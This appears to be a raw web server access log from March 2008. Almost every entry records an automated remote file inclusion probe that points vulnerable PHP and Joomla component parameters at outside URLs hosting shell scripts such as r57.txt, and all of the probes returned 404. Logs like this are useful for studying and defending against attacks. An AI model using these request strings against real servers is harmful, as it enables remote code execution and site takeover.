77.232.66.107 - - [02/Mar/2008:17:41:07 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.vici.lt/images/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.72.125.210 - - [02/Mar/2008:17:44:58 -0800] "GET /logs/access_071112.loghttp://weddingparty.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.toulouseangloexchange.com"
213.193.215.56 - - [02/Mar/2008:17:46:42 -0800] "GET /skin/zero_vote/error.php?dir=http://h1.ripway.com/mybeta/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
213.193.215.56 - - [02/Mar/2008:17:46:50 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://h1.ripway.com/mybeta/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
158.75.35.9 - - [02/Mar/2008:17:50:17 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [02/Mar/2008:17:50:18 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.72.125.210 - - [02/Mar/2008:17:50:50 -0800] "GET /logs/access_071105.loghttp://weddingparty.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
209.85.29.25 - - [02/Mar/2008:17:54:27 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
209.85.29.25 - - [02/Mar/2008:17:54:27 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.formula.altervista.org/php5/r57.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:17:56:39 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:17:56:39 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
81.92.222.169 - - [02/Mar/2008:17:56:49 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.toulouseangloexchange.com"
81.92.222.169 - - [02/Mar/2008:17:56:49 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
67.212.164.34 - - [02/Mar/2008:17:56:52 -0800] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.212.164.34 - - [02/Mar/2008:17:56:52 -0800] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.212.164.34 - - [02/Mar/2008:17:56:52 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:17:56:55 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:17:56:56 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:17:57:24 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:17:57:24 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:17:57:24 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:17:57:24 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:17:57:25 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
217.195.204.234 - - [02/Mar/2008:17:57:25 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
77.232.66.107 - - [02/Mar/2008:18:03:25 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vici.lt/images/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.66.107 - - [02/Mar/2008:18:03:25 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vici.lt/images/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.109.123.107 - - [02/Mar/2008:18:03:25 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
208.109.123.107 - - [02/Mar/2008:18:03:26 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
208.100.26.14 - - [02/Mar/2008:18:06:27 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_080128.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.100.26.14 - - [02/Mar/2008:18:06:27 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.100.26.14 - - [02/Mar/2008:18:06:27 -0800] "GET /logs/%3Cwbr%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [02/Mar/2008:18:06:41 -0800] "GET /logs/access_071105.log//skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [02/Mar/2008:18:06:41 -0800] "GET /logs/access_071105.log//skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [02/Mar/2008:18:06:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [02/Mar/2008:18:06:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:07:41 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:07:42 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:07:42 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.100.26.14 - - [02/Mar/2008:18:07:42 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:07:47 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:07:47 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:07:48 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:07:48 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:07:48 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:07:48 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:08:27 -0800] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:08:47 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:08:47 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:08:47 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.232.66.107 - - [02/Mar/2008:18:08:51 -0800] "GET /logs/access_071022.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vici.lt/images/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.100.26.14 - - [02/Mar/2008:18:09:02 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.147.163.85 - - [02/Mar/2008:18:09:31 -0800] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:10:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:10:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:10:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:10:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:10:08 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:10:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:12:58 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:12:58 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:12:58 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:12:58 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:12:58 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
68.142.135.142 - - [02/Mar/2008:18:12:58 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
85.214.123.206 - - [02/Mar/2008:18:13:09 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
85.214.123.206 - - [02/Mar/2008:18:13:09 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:16:04 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:16:04 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:18:16:04 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:16:04 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:18:16:04 -0800] "GET /ncaster/admin/addons/archive/archive.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:18:16:05 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:16:06 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:16:06 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:16:06 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:18:27 -0800] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.169.46.98 - - [02/Mar/2008:18:18:27 -0800] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "toulouseangloexchange.com"
193.188.66.23 - - [02/Mar/2008:18:18:34 -0800] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.232.66.107 - - [02/Mar/2008:18:20:21 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vici.lt/images/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.66.107 - - [02/Mar/2008:18:20:21 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.vici.lt/images/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
194.126.239.14 - - [02/Mar/2008:18:21:11 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.67.83.25 - - [02/Mar/2008:18:21:53 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.30.216.106 - - [02/Mar/2008:18:25:02 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.212.164.34 - - [02/Mar/2008:18:26:28 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.212.164.34 - - [02/Mar/2008:18:26:28 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.212.164.34 - - [02/Mar/2008:18:26:28 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [02/Mar/2008:18:27:18 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:18:27:52 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:18:27:53 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:18:27:54 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:18:28:12 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:18:28:13 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.69.144.194 - - [02/Mar/2008:18:28:14 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.255.32.189 - - [02/Mar/2008:18:30:58 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
194.126.239.14 - - [02/Mar/2008:18:33:42 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
194.126.239.14 - - [02/Mar/2008:18:33:42 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.91.30.3 - - [02/Mar/2008:18:33:54 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:18:35:01 -0800] "GET /logs/index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:18:35:01 -0800] "GET /index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
87.118.102.153 - - [02/Mar/2008:18:35:11 -0800] "GET /index.php?option=com_simpleboard&Itemid=&func=&catid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.toulouseangloexchange.com"
